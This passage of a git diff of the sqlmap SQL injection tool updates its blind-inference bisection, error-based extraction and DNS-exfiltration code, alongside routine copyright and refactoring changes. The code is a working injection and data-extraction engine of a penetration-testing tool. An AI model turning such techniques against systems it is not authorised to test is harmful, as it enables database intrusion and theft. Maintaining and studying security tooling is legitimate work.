[Y/n] " - choice = readInput(message, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(message, default='Y', boolean=True): self._xpCmdshellConfigure(1) if self._xpCmdshellCheck(): diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/__init__.py +++ b/lib/techniques/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/blind/__init__.py +++ b/lib/techniques/blind/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 5419bd9cb..100709480 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import re import threading import time @@ -41,9 +42,12 @@ from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR from lib.core.settings import MAX_BISECTION_LENGTH -from lib.core.settings import MAX_TIME_REVALIDATION_STEPS +from lib.core.settings import MAX_REVALIDATION_STEPS +from lib.core.settings import NULL from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import PAYLOAD_DELIMITER +from lib.core.settings import RANDOM_INTEGER_MARKER from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads @@ -64,6 +68,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None finalValue = None retrievedLength = 0 asciiTbl = getCharset(charsetType) + threadData = getCurrentThreadData() timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) @@ -89,11 +94,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return 0, retVal try: - # Set kb.partRun in case "common prediction" feature (a.k.a. "good - # samaritan") is used or the engine is called from the API + # Set kb.partRun in case "common prediction" feature (a.k.a. 
"good samaritan") is used or the engine is called from the API if conf.predictOutput: kb.partRun = getPartRun() - elif hasattr(conf, "api"): + elif conf.api: kb.partRun = getPartRun(alias=False) else: kb.partRun = None @@ -102,8 +106,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None firstChar = len(partialValue) elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): firstChar = 0 - elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): + elif (kb.fileReadMode or dump) and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 + if kb.fileReadMode: + firstChar *= 2 elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int): firstChar = int(firstChar) - 1 else: @@ -141,17 +147,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None length = None showEta = conf.eta and isinstance(length, int) - numThreads = min(conf.threads, length) + numThreads = min(conf.threads, length) or 1 if showEta: progress = ProgressBar(maxValue=length) - if timeBasedCompare and conf.threads > 1: + if timeBasedCompare and conf.threads > 1 and not conf.forceThreads: warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" singleTimeWarnMessage(warnMsg) if numThreads > 1: - if not timeBasedCompare: + if not timeBasedCompare or conf.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: @@ -162,7 +168,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and not conf.api: if isinstance(length, int) and conf.threads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) @@ -181,8 +187,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None else: posValue = ord(hintValue[idx - 1]) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + forgedPayload = agent.extractPayload(payload) + forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) + result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: @@ -195,24 +202,32 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None def validateChar(idx, value): """ - Used in time-based inference (in case that original and retrieved - value are not equal there will be a deliberate delay). 
+ Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay """ + validationPayload = re.sub(r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload) + if "'%s'" % CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + + result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + + if result and timeBasedCompare: + result = threadData.lastCode == kb.injection.data[kb.technique].trueCode + if not result: + warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode) + singleTimeWarnMessage(warnMsg) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) - return not result + return result - def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None): + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 @@ -232,8 +247,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] - if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: - charTbl.remove(ord('\n')) + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + charTbl.remove(ord(char)) if not charTbl: return None @@ -250,22 +267,72 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] + firstCheck = False + lastCheck = False + unexpectedCode = False while len(charTbl) != 1: - position = (len(charTbl) >> 1) + position = None + + if charsetType is None: + if not firstCheck: + try: + try: + lastChar = [_ for _ in threadData.shared.value if _ is not None][-1] + except IndexError: + lastChar = None + if 'a' <= lastChar <= 'z': + position = charTbl.index(ord('a') - 1) # 96 + elif 'A' <= lastChar <= 'Z': + position = charTbl.index(ord('A') - 1) # 64 + elif '0' <= lastChar <= '9': + position = charTbl.index(ord('0') - 1) # 47 + except ValueError: + pass + finally: + firstCheck = True + + elif not lastCheck and numThreads == 1: # not usable in multi-threading environment + if charTbl[(len(charTbl) >> 1)] < ord(' '): + try: + # favorize last char check if current value inclines toward 0 + position = charTbl.index(1) + except ValueError: + pass + finally: + lastCheck = True + + if position is None: + position = (len(charTbl) >> 1) + posValue = charTbl[position] + falsePayload = None if "'%s'" % 
CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) + + if timeBasedCompare: + if kb.responseTimeMode: + kb.responseTimePayload = falsePayload + else: + kb.responseTimePayload = None result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) + if not timeBasedCompare: + unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode) + if unexpectedCode: + warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode + singleTimeWarnMessage(warnMsg) + if result: minValue = posValue @@ -305,26 +372,27 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None retVal = minValue + 1 if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): - if timeBasedCompare and not validateChar(idx, retVal): + if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec - kb.timeValidCharsRun = 0 - if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS: + threadData.validationRun = 0 + if retried < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) - if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: - conf.timeSec += 1 - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.warn(warnMsg) + if timeBasedCompare: + if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: + conf.timeSec += 1 + warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') + logger.warn(warnMsg) - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - dbgMsg = "turning off time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: + dbgMsg = "turning off time auto-adjustment mechanism" + logger.debug(dbgMsg) + kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - return getChar(idx, originalTbl, continuousOrder, expand, shiftTable) + return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." 
% decodeIntToUnicode(retVal) logger.error(errMsg) @@ -332,8 +400,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return decodeIntToUnicode(retVal) else: if timeBasedCompare: - kb.timeValidCharsRun += 1 - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: + threadData.validationRun += 1 + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES @@ -363,8 +431,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Go multi-threading (--threads > 1) if conf.threads > 1 and isinstance(length, int) and length > 1: - threadData = getCurrentThreadData() - threadData.shared.value = [None] * length threadData.shared.index = [firstChar] # As list for python nested function scoping threadData.shared.start = firstChar @@ -427,7 +493,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): output = output[:-2] + '..' - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and not conf.api: _ = count - firstChar output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) @@ -457,12 +523,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) - if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and infoMsg and not conf.api: dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar + threadData.shared.value = "" while True: index += 1 @@ -492,7 +559,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if result: if showEta: progress.progress(time.time() - charStart, len(commonValue)) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): + elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(commonValue[index - 1:])) finalValue = commonValue @@ -538,11 +605,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if kb.data.processChar: val = kb.data.processChar(val) - partialValue += val + threadData.shared.value = partialValue = partialValue + val if showEta: progress.progress(time.time() - charStart, index) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): + elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(val)) # some DBMSes (e.g. Firebird, DB2, etc.) 
have issues with trailing spaces @@ -569,11 +636,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None elif partialValue: hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) - if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"): + if conf.hexConvert and not abortedFlag and not conf.api: infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and not conf.api: dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: @@ -587,6 +654,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None raise KeyboardInterrupt _ = finalValue or partialValue + return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ def queryOutputLength(expression, payload): @@ -597,8 +665,9 @@ def queryOutputLength(expression, payload): infoMsg = "retrieving the length of query output" logger.info(infoMsg) - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py deleted file mode 100644 index 8d7bcd8f0..000000000 --- a/lib/techniques/brute/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/dns/__init__.py +++ b/lib/techniques/dns/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 1d8b8c569..7fc652fdd 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,7 +24,7 @@ def dnsTest(payload): if not kb.dnsTest: errMsg = "data retrieval through DNS channel failed" if not conf.forceDns: - conf.dnsName = None + conf.dnsDomain = None errMsg += ". 
Turning off DNS exfiltration support" logger.error(errMsg) else: diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 8b09335bd..66a489946 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -46,7 +46,7 @@ def dnsUse(payload, expression): count = 0 offset = 1 - if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: @@ -61,11 +61,15 @@ def dnsUse(payload, expression): chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) + extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) + if extendedField != fieldToCastStr: # e.g. MIN(surname) + nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) + fieldToCastStr = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) nulledCastedField = agent.hexConvertField(nulledCastedField) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) + expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) expressionUnescaped = unescaper.escape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): @@ -107,7 +111,7 @@ def dnsUse(payload, expression): debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) - elif conf.dnsName: + elif conf.dnsDomain: warnMsg = "DNS data exfiltration method through SQL injection " warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() singleTimeWarnMessage(warnMsg) diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/error/__init__.py +++ b/lib/techniques/error/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 813a764c2..fc928eadb 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -16,6 +16,7 @@ from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult +from lib.core.common import 
getConsoleWidth from lib.core.common import getPartRun from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve @@ -27,6 +28,7 @@ from lib.core.common import isNumPosStrValue from lib.core.common import listToStrValue from lib.core.common import readInput from lib.core.common import unArrayizeValue +from lib.core.common import wasLastResponseHTTPError from lib.core.convert import hexdecode from lib.core.convert import htmlunescape from lib.core.data import conf @@ -35,12 +37,15 @@ from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.enums import HTTP_HEADER +from lib.core.exception import SqlmapDataException from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH -from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH +from lib.core.settings import MIN_ERROR_CHUNK_LENGTH +from lib.core.settings import MAX_ERROR_CHUNK_LENGTH from lib.core.settings import NULL from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import ROTATING_CHARS from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT @@ -50,8 +55,9 @@ from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar -def _oneShotErrorUse(expression, field=None): +def _oneShotErrorUse(expression, field=None, chunkTest=False): offset = 1 + rotator = 0 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) @@ -63,28 +69,47 @@ def _oneShotErrorUse(expression, field=None): threadData.resumed = retVal is not None and not partialValue - if Backend.isDbms(DBMS.MYSQL): - chunk_length = MYSQL_ERROR_CHUNK_LENGTH - elif Backend.isDbms(DBMS.MSSQL): - chunk_length = MSSQL_ERROR_CHUNK_LENGTH - else: - chunk_length = None + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: + debugMsg = "searching for error chunk length..." 
+ logger.debug(debugMsg) + + current = MAX_ERROR_CHUNK_LENGTH + while current >= MIN_ERROR_CHUNK_LENGTH: + testChar = str(current % 10) + testQuery = "SELECT %s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) + result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) + + if (result or "").startswith(testChar): + if result == testChar * current: + kb.errorChunkLength = current + break + else: + result = re.search(r"\A\w+", result).group(0) + candidate = len(result) - len(kb.chars.stop) + current = candidate if candidate != current else current - 1 + else: + current = current / 2 + + if kb.errorChunkLength: + hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) + else: + kb.errorChunkLength = 0 if retVal is None or partialValue: try: while True: - check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start) + check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")): # skip chunking of scalar expression (unneeded) + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) + nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) # Forge the error-based SQL injection request vector = kb.injection.data[kb.technique].vector @@ -96,7 +121,7 @@ def _oneShotErrorUse(expression, field=None): payload = agent.payload(newValue=injExpression) # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(kb.technique) @@ -106,32 +131,29 @@ def _oneShotErrorUse(expression, field=None): # Parse the returned page to get the exact error-based # SQL injection output output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ + extractRegexResult(check, page), \ + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \ + extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)), \ + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \ None) if output is not None: output = getUnicode(output) else: - trimmed = 
extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + trimmed = extractRegexResult(trimcheck, page) \ + or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \ + or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)) \ + or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) if trimmed: - warnMsg = "possible server trimmed output detected " - warnMsg += "(due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) + if not chunkTest: + warnMsg = "possible server trimmed output detected " + warnMsg += "(due to its length and/or content): " + warnMsg += safecharencode(trimmed) + logger.warn(warnMsg) if not kb.testMode: - check = "(?P<result>.*?)%s" % kb.chars.stop[:2] + check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2] output = extractRegexResult(check, trimmed, re.IGNORECASE) if not output: @@ -146,13 +168,21 @@ def _oneShotErrorUse(expression, field=None): else: retVal += output if output else '' - if output and len(output) >= chunk_length: - offset += chunk_length + if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: + offset += kb.errorChunkLength else: break - if kb.fileReadMode and output: - dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + if output and conf.verbose in (1, 2) and not conf.api: + if kb.fileReadMode: + dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + elif offset > 1: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) else: retVal = output break @@ -172,8 +202,8 @@ def _oneShotErrorUse(expression, field=None): hashDBWrite(expression, retVal) else: - _ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal + _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + retVal = extractRegexResult(_, retVal) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal @@ -181,6 +211,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e values = [] origExpr = None + width = getConsoleWidth() threadData = getCurrentThreadData() for field in expressionFieldsList: @@ -207,7 +238,12 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e if kb.fileReadMode and output and output.strip(): print elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output))) + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + + if len(status) > width: + 
